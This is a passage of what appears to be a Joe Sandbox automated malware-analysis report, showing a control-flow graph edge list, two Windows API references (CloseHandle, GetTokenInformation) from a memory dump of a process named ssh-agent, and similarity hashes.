549->545 559 d71665 549->559 550->545 558 d7172d 550->558 551->517 586 d683d0 551->586 562 d71670-d71684 553->562 563 d715dc-d715df 553->563 556 d71625-d71628 554->556 557 d716a0-d716b4 554->557 556->540 566 d7162a-d71636 556->566 568 d716b6-d716b9 557->568 569 d716f4-d716f5 557->569 558->546 559->546 562->519 567 d7168a-d7168d 562->567 563->540 570 d715e1-d715f6 563->570 565->564 571 d68240 565->571 566->548 572 d716dc-d716ec 566->572 573 d71693-d71697 567->573 574 d7172f-d71738 567->574 576 d716bb 568->576 577 d7173a-d7173b 568->577 582 d716fe-d7170c 569->582 578 d716d2-d716d7 570->578 579 d715fc-d71600 570->579 583 d7b32e-d7b330 571->583 572->545 580 d716f2 572->580 585 d716bf-d716cd 573->585 584 d7173f-d71740 574->584 576->585 577->584 578->526 581 d71606-d71618 579->581 579->582 580->546 581->532 588 d71744-d71748 582->588 589 d7b332-d7b337 call d972f4 583->589 590 d7b300 583->590 584->588 586->517 591 d683d6 586->591 589->590 599 d7b339 589->599 595 d7b302 590->595 596 d7b2fd 590->596 591->564 597 d7b305 596->597 598 d7b2ff 596->598 600 d7b322-d7b32d 597->600 601 d7b308-d7b315 597->601 598->601 599->590 602 d7b33b-d7b33f 599->602 600->583 601->597 604 d7b317 601->604 602->601 604->596
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNELBASE ref: 00D6830B
                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 00D68369
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000002.2856464837.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_2_d60000_ssh-agent.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction ID: c12b3148c01431dc45dd94a3f3c3f2cebd2df6252f57c523592908890b6d7b46
                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction Fuzzy Hash: 77F0907440DF418BCA25CB14E46053667A0BF25750B6C07A9C486CB222CE28DC46FB76